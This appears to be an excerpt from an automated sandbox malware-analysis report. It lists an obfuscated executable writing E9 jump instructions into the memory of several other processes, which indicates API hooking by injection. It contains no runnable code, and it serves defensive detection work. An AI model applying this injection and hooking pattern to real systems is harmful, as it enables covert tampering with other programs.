            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 769A6C19 value: E9 32 06 A7 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 769A4889 value: E9 82 D4 A6 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 76A91D20 value: E9 7B 03 98 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 76A0BF10 value: E9 4B 62 A0 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 76A81610 value: E9 8B 0D 99 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 774D0078 value: E9 53 53 F4 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 774EEB2A value: E9 D1 67 F2 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 774CFA50 value: E9 3B 69 CE 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 774CFDA8 value: E9 93 68 CE 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 757158CD value: E9 2E B7 A9 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 757182ED value: E9 AE 8D A9 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 7576DF21 value: E9 EA 45 A4 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 75709AE0 value: E9 8B 8A AA 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 756F5366 value: E9 55 BE AB 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 756F3EFC value: E9 8F D3 AB 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 69CBA9B0 value: E9 3B 6D 4F 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 69CA572C value: E9 AF C0 50 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 769A6C19 value: E9 32 06 81 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 769A4889 value: E9 82 D4 80 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 76A91D20 value: E9 7B 03 72 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 76A0BF10 value: E9 4B 62 7A 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 76A81610 value: E9 8B 0D 73 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 774D0078 value: E9 53 53 CE 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 892 base: 774EEB2A value: E9 D1 67 CC 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 774CFA50 value: E9 3B 69 E8 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 774CFDA8 value: E9 93 68 E8 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 757158CD value: E9 2E B7 C3 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 757182ED value: E9 AE 8D C3 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 7576DF21 value: E9 EA 45 BE 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 75709AE0 value: E9 8B 8A C4 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 756F5366 value: E9 55 BE C5 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 756F3EFC value: E9 8F D3 C5 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 69CBA9B0 value: E9 3B 6D 69 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 69CA572C value: E9 AF C0 6A 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 769A6C19 value: E9 32 06 9B 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 769A4889 value: E9 82 D4 9A 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 76A91D20 value: E9 7B 03 8C 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 76A0BF10 value: E9 4B 62 94 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 76A81610 value: E9 8B 0D 8D 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 774D0078 value: E9 53 53 E8 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1968 base: 774EEB2A value: E9 D1 67 E6 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 774CFA50 value: E9 3B 69 E4 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 774CFDA8 value: E9 93 68 E4 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 757158CD value: E9 2E B7 BF 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 757182ED value: E9 AE 8D BF 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 7576DF21 value: E9 EA 45 BA 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 75709AE0 value: E9 8B 8A C0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 756F5366 value: E9 55 BE C1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 756F3EFC value: E9 8F D3 C1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 69CBA9B0 value: E9 3B 6D 65 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 69CA572C value: E9 AF C0 66 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 769A6C19 value: E9 32 06 97 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 769A4889 value: E9 82 D4 96 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 76A91D20 value: E9 7B 03 88 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 76A0BF10 value: E9 4B 62 90 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 76A81610 value: E9 8B 0D 89 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 774D0078 value: E9 53 53 E4 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 172 base: 774EEB2A value: E9 D1 67 E2 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 774CFA50 value: E9 3B 69 EB 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 774CFDA8 value: E9 93 68 EB 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 757158CD value: E9 2E B7 C6 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 757182ED value: E9 AE 8D C6 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 7576DF21 value: E9 EA 45 C1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 75709AE0 value: E9 8B 8A C7 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 756F5366 value: E9 55 BE C8 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 756F3EFC value: E9 8F D3 C8 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 69CBA9B0 value: E9 3B 6D 6C 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 69CA572C value: E9 AF C0 6D 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 769A6C19 value: E9 32 06 9E 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 769A4889 value: E9 82 D4 9D 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 76A91D20 value: E9 7B 03 8F 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 76A0BF10 value: E9 4B 62 97 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 76A81610 value: E9 8B 0D 90 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 774D0078 value: E9 53 53 EB 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 492 base: 774EEB2A value: E9 D1 67 E9 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 774CFA50 value: E9 3B 69 C3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 774CFDA8 value: E9 93 68 C3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 757158CD value: E9 2E B7 9E 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 757182ED value: E9 AE 8D 9E 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 7576DF21 value: E9 EA 45 99 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 75709AE0 value: E9 8B 8A 9F 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 756F5366 value: E9 55 BE A0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 756F3EFC value: E9 8F D3 A0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 69CBA9B0 value: E9 3B 6D 44 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 69CA572C value: E9 AF C0 45 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 769A6C19 value: E9 32 06 76 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 769A4889 value: E9 82 D4 75 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 76A91D20 value: E9 7B 03 67 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 76A0BF10 value: E9 4B 62 6F 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 76A81610 value: E9 8B 0D 68 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 774D0078 value: E9 53 53 C3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1784 base: 774EEB2A value: E9 D1 67 C1 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 774CFA50 value: E9 3B 69 C3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 774CFDA8 value: E9 93 68 C3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 757158CD value: E9 2E B7 9E 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 757182ED value: E9 AE 8D 9E 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 7576DF21 value: E9 EA 45 99 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 75709AE0 value: E9 8B 8A 9F 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 756F5366 value: E9 55 BE A0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 756F3EFC value: E9 8F D3 A0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 69CBA9B0 value: E9 3B 6D 44 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 69CA572C value: E9 AF C0 45 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 769A6C19 value: E9 32 06 76 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 769A4889 value: E9 82 D4 75 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 76A91D20 value: E9 7B 03 67 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 76A0BF10 value: E9 4B 62 6F 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 76A81610 value: E9 8B 0D 68 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 774D0078 value: E9 53 53 C3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1396 base: 774EEB2A value: E9 D1 67 C1 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 774CFA50 value: E9 3B 69 D5 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 774CFDA8 value: E9 93 68 D5 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 757158CD value: E9 2E B7 B0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 757182ED value: E9 AE 8D B0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 7576DF21 value: E9 EA 45 AB 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 75709AE0 value: E9 8B 8A B1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 756F5366 value: E9 55 BE B2 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 756F3EFC value: E9 8F D3 B2 8A Jump to behavior
